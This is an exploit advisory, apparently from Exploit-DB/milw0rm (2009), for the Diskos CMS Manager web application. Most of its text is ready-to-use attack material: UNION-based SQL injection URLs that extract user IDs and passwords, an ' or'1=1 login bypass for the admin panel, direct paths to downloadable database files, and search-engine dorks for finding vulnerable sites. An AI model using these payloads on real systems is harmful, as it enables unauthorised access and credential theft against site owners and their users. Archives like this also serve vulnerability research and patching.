Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass

EDB-ID:

8307


Platform:

ASP

Published:

2009-03-30

************************************************************
**         Diskos CMS Manager & multiple vulnerabilitiesS
************************************************************
**  Prodcut:		Diskos CMS Manager  
**  Home   : 		http://www.diskos.dk
**  Vunlerability :	SQL Injection & admin byapass & database disclosure 
**  Dork : 		"Powered By diskos"
**  			inurl:"side.asp?kat=1"
************************************************************
** Discovred by:	AnGeL25dZ
** Contact     : 	angel25dz@gmail.com	
** *********************************************************
** Greetz to :	 ALLAH 
**		 All Members of H-T (http://h-t.cc/cc)
**		 All Members of Islam-attack.com
*************************************************************
******************** SQL Injection **************************
************************************************************* 
** Exploit:  
** USERS :http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
** ADMIn :http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**  
** Administration Login : http://[path]/diskos6/
**
**************************************************************
********************** Admin bypass **************************
************************************************************** 
**  
** Administration Login : http://[path]/diskos6/
**  			  brugerid: ' or'1=1
**			  password: ' or'1=1
****************************************************************
******************** database disclosure **********************
****************************************************************
** http://[path]/db/log.mdb 
** 		    artikler_prod.mdb
**                  medlemmer.mdb
******************************************************************
** Live demo : http://www.diskos.dk/
****************************************************************

# milw0rm.com [2009-03-30]